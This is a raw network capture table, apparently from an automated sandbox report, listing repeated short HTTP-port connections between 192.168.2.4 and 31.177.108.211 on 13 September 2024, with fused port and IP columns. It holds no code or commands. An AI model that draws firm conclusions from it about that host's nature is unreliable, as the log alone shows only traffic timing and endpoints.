                                          Sep 13, 2024 21:02:55.494278908 CEST805669231.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:55.628921032 CEST5669280192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:55.655364037 CEST805669231.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:55.832024097 CEST5669280192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:55.832808018 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:55.832830906 CEST5669280192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:55.833106041 CEST5669380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:55.839494944 CEST805669331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:55.839607954 CEST5669380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:55.839740038 CEST5669380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:55.839948893 CEST805668931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:55.839981079 CEST805669231.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:55.840004921 CEST5668980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:55.840029955 CEST5669280192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:55.846395969 CEST805669331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:56.191507101 CEST5669380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:56.197361946 CEST805669331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:56.197400093 CEST805669331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:56.197427988 CEST805669331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:56.575354099 CEST805669331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:56.660176039 CEST5669380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:56.734886885 CEST805669331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:56.957158089 CEST5669380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:56.958065033 CEST805669331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:56.958161116 CEST5669380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:56.978801012 CEST5669480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:56.983990908 CEST805669431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:56.984066010 CEST5669480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:56.984200001 CEST5669480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:56.989059925 CEST805669431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:57.332153082 CEST5669480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:57.386018038 CEST805669431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:57.386070967 CEST805669431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:57.386101007 CEST805669431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:57.770236015 CEST805669431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:57.844551086 CEST805669431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:57.844614983 CEST5669480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:57.996824980 CEST5669480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:57.998282909 CEST5669580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:58.002789021 CEST805669431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:58.002845049 CEST5669480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:58.003453970 CEST805669531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:58.003528118 CEST5669580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:58.003643990 CEST5669580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:58.008943081 CEST805669531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:58.347904921 CEST5669580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:58.535315037 CEST5669580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:58.925816059 CEST5669580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:59.310674906 CEST805669531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:59.311574936 CEST805669531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:59.311652899 CEST5669580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:59.312273026 CEST805669531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:59.312324047 CEST5669580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:59.312829018 CEST805669531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:59.312897921 CEST5669580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:59.313608885 CEST805669531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:59.313726902 CEST805669531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:59.313755989 CEST805669531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:59.313927889 CEST805669531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:59.316572905 CEST805669531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:59.317766905 CEST805669531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:59.317890882 CEST805669531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:59.694792986 CEST805669531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:59.816288948 CEST5669680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:59.816355944 CEST5669580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:59.821396112 CEST805669631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:59.821465015 CEST805669531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:59.821472883 CEST5669680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:59.821511984 CEST5669580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:59.821613073 CEST5669680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:59.826493025 CEST805669631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:59.912312031 CEST5669680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:59.912324905 CEST5669780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:59.917385101 CEST805669731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:59.917669058 CEST5669780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:59.917995930 CEST5669780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:02:59.923024893 CEST805669731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:02:59.957858086 CEST805669631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:00.034130096 CEST5669880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:00.039175987 CEST805669831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:00.039376020 CEST5669880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:00.039376020 CEST5669880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:00.046629906 CEST805669831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:00.269742966 CEST5669780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:00.275427103 CEST805669731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:00.275458097 CEST805669731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:00.320849895 CEST805669631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:00.320904016 CEST5669680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:00.394701004 CEST5669880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:00.400507927 CEST805669831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:00.400568962 CEST805669831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:00.400595903 CEST805669831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:00.670336008 CEST805669731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:00.738344908 CEST5669780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:00.804676056 CEST805669731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:00.806051970 CEST805669831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:00.925925016 CEST5669780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:00.929290056 CEST5669880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:00.961168051 CEST805669831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:01.035208941 CEST5669880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:01.090558052 CEST5669780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:01.090558052 CEST5669880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:01.091181993 CEST5669980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:01.096579075 CEST805669731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:01.096637011 CEST805669931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:01.096641064 CEST5669780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:01.096709013 CEST805669831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:01.096710920 CEST5669980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:01.096760035 CEST5669880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:01.096824884 CEST5669980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:01.101895094 CEST805669931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:01.441534996 CEST5669980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:01.446737051 CEST805669931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:01.446777105 CEST805669931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:01.446805000 CEST805669931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:01.866187096 CEST805669931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:02.000488997 CEST805669931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:02.002693892 CEST5669980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:02.218919992 CEST5670080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:02.224941015 CEST805670031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:02.225016117 CEST5670080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:02.225126982 CEST5670080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:02.230288982 CEST805670031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:02.582161903 CEST5670080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:02.587272882 CEST805670031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:02.587486982 CEST805670031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:02.587516069 CEST805670031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:02.966633081 CEST805670031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:03.035260916 CEST5670080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:03.100908041 CEST805670031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:03.222721100 CEST5670080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:03.227688074 CEST5670080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:03.227992058 CEST5670280192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:03.238310099 CEST805670231.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:03.238645077 CEST5670280192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:03.238744974 CEST5670280192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:03.239696980 CEST805670031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:03.239794016 CEST5670080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:03.243714094 CEST805670231.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:03.597879887 CEST5670280192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:03.602907896 CEST805670231.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:03.603013039 CEST805670231.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:03.603039980 CEST805670231.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:04.034991026 CEST805670231.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:04.160207033 CEST5670280192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:04.193108082 CEST805670231.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:04.269586086 CEST5670280192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:04.801651001 CEST5670280192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:04.802083969 CEST5670380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:04.807145119 CEST805670331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:04.807180882 CEST805670231.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:04.807246923 CEST5670380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:04.807413101 CEST5670280192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:04.807431936 CEST5670380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:04.812396049 CEST805670331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:05.160397053 CEST5670380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:05.166121006 CEST805670331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:05.166156054 CEST805670331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:05.166188955 CEST805670331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:05.556852102 CEST805670331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:05.685635090 CEST805670331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:05.685714006 CEST5670380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:05.817176104 CEST5670480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:05.817285061 CEST5670380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:05.822180986 CEST805670431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:05.822263956 CEST5670480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:05.822371006 CEST5670480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:05.822458029 CEST805670331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:05.822514057 CEST5670380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:05.827156067 CEST805670431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:05.846085072 CEST5670580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:05.850994110 CEST805670531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:05.851080894 CEST5670580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:05.851211071 CEST5670580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:05.856192112 CEST805670531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:06.175892115 CEST5670480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:06.180979967 CEST805670431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:06.181144953 CEST805670431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:06.207284927 CEST5670580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:06.212321997 CEST805670531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:06.212352037 CEST805670531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:06.212378979 CEST805670531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:06.556216955 CEST805670431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:06.586021900 CEST805670531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:06.660243034 CEST5670480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:06.684621096 CEST805670431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:06.686420918 CEST5670580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:06.691658020 CEST805670531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:06.691910982 CEST5670580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:06.769562960 CEST5670480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:06.892851114 CEST5670480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:06.893274069 CEST5670680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:06.897964001 CEST805670431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:06.898024082 CEST5670480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:06.898205996 CEST805670631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:06.898287058 CEST5670680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:06.898370028 CEST5670680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:06.903179884 CEST805670631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:07.260111094 CEST5670680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:07.265343904 CEST805670631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:07.265382051 CEST805670631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:07.265408039 CEST805670631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:07.680075884 CEST805670631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:07.738344908 CEST5670680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:07.854856968 CEST805670631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:07.925849915 CEST5670680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:07.975511074 CEST5670680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:07.979499102 CEST5670780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:07.984550953 CEST805670731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:07.984615088 CEST5670780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:07.984697104 CEST5670780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:07.990143061 CEST805670731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:08.332194090 CEST5670780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:08.497500896 CEST805670731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:08.497551918 CEST805670731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:08.497797012 CEST805670731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:08.750447035 CEST805670731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:08.884655952 CEST805670731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:08.884764910 CEST5670780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:09.010570049 CEST5670780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:09.010869980 CEST5670880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:09.016022921 CEST805670731.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:09.016293049 CEST805670831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:09.016350031 CEST5670780192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:09.016372919 CEST5670880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:09.016480923 CEST5670880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:09.021672010 CEST805670831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:09.363411903 CEST5670880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:09.373655081 CEST805670831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:09.373783112 CEST805670831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:09.373811960 CEST805670831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:09.766700983 CEST805670831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:09.816451073 CEST5670880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:09.924606085 CEST805670831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:09.972719908 CEST5670880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:10.076620102 CEST5670880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:10.081693888 CEST5670980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:10.082189083 CEST805670831.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:10.082250118 CEST5670880192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:10.087588072 CEST805670931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:10.087667942 CEST5670980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:10.087774038 CEST5670980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:10.093771935 CEST805670931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:10.441704035 CEST5670980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:10.447144985 CEST805670931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:10.447181940 CEST805670931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:10.447213888 CEST805670931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:10.847594976 CEST805670931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:10.972857952 CEST5670980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:11.000494957 CEST805670931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:11.127338886 CEST5670980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:11.127790928 CEST5671080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:11.132920980 CEST805671031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:11.133136988 CEST805670931.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:11.133155107 CEST5671080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:11.133155107 CEST5671080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:11.133210897 CEST5670980192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:11.138129950 CEST805671031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:11.488446951 CEST5671080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:11.493540049 CEST805671031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:11.493582964 CEST805671031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:11.493612051 CEST805671031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:11.692411900 CEST5671180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:11.692723036 CEST5671080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:11.697431087 CEST805671131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:11.697958946 CEST805671031.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:11.698041916 CEST5671080192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:11.698117018 CEST5671180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:11.698117018 CEST5671180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:11.709505081 CEST805671131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:11.814343929 CEST5671280192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:11.819479942 CEST805671231.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:11.819566965 CEST5671280192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:11.819670916 CEST5671280192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:11.824575901 CEST805671231.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:12.052371025 CEST5671180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:12.057307959 CEST805671131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:12.057329893 CEST805671131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:12.179837942 CEST5671280192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:12.185055017 CEST805671231.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:12.185187101 CEST805671231.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:12.185215950 CEST805671231.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:12.437541008 CEST805671131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:12.550863028 CEST5671180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:12.568710089 CEST805671131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:12.580866098 CEST805671231.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:12.660223961 CEST5671180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:12.660228014 CEST5671280192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:12.749082088 CEST805671231.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:12.906733990 CEST5671180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:12.906832933 CEST5671280192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:12.912005901 CEST805671131.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:12.912096024 CEST5671180192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:12.912296057 CEST805671231.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:12.912358046 CEST5671280192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:12.913064957 CEST5671380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:12.917994022 CEST805671331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:12.918067932 CEST5671380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:12.918162107 CEST5671380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:12.923415899 CEST805671331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:13.269975901 CEST5671380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:13.275010109 CEST805671331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:13.275052071 CEST805671331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:13.275079012 CEST805671331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:13.649657965 CEST805671331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:13.776314020 CEST805671331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:13.778759003 CEST5671380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:13.915205002 CEST5671380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:13.917994976 CEST5671480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:13.922799110 CEST805671331.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:13.922874928 CEST5671380192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:13.922911882 CEST805671431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:13.923116922 CEST5671480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:13.923214912 CEST5671480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:13.928215981 CEST805671431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:14.270070076 CEST5671480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:14.451505899 CEST805671431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:14.451564074 CEST805671431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:14.451867104 CEST805671431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:14.669158936 CEST805671431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:14.821662903 CEST805671431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:14.826750040 CEST5671480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:15.250466108 CEST5671480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:15.250785112 CEST5671580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:15.255887985 CEST805671431.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:15.255970955 CEST5671480192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:15.256048918 CEST805671531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:15.256211042 CEST5671580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:15.256256104 CEST5671580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:15.261764050 CEST805671531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:15.613992929 CEST5671580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:15.619225979 CEST805671531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:15.619263887 CEST805671531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:15.619438887 CEST805671531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:15.999147892 CEST805671531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:16.152424097 CEST805671531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:16.154927015 CEST5671580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:16.290659904 CEST5671580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:16.290942907 CEST5671680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:16.296448946 CEST805671631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:16.296906948 CEST5671680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:16.296906948 CEST5671680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:16.298818111 CEST805671531.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:16.301196098 CEST5671580192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:16.302119017 CEST805671631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:16.645234108 CEST5671680192.168.2.431.177.108.211
                                          Sep 13, 2024 21:03:16.650356054 CEST805671631.177.108.211192.168.2.4
                                          Sep 13, 2024 21:03:16.650389910 CEST805671631.177.108.211192.168.2.4
